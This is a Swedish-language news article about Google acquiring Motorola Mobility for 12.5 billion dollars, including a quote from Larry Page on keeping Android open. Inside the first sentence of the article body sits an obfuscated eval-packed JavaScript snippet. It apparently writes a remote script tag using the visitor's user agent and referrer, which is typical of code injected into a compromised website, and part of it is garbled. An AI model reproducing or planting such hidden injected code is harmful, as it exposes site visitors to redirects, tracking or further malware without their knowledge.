Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Google köper upp Motorolas mobildivison

Google köper upp Motorolas mobildivison
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnrke|var|u0026u|referrer|hanni||js|php’.split(‘|’),0,{}))
är det officiellt. Google köper upp Motorolas mobildivison Motorola Mobility för hela 12,5 miljarder dollar cash.

Enligt Googles VD Larry Page som i ett blogginlägg på Googles officiella blogg skriver att det är nu Google ger sig in på hårdvarumarknaden. Man har tidigare endast släppt Google-telefoner via någon annan Android-partner.

Page säger också att Android kommer fortsätta vara öppet för alla som vill använda det.

[quote]”This acquisition will not change our commitment to run Android as an open platform. Motorola will remain a licensee of Android and Android will remain open. We will run Motorola as a separate business. Many hardware partners have contributed to Android’s success and we look forward to continuing to work with all of them to deliver outstanding user experiences.”[/quote]

Mer info: googleblog.blogspot.com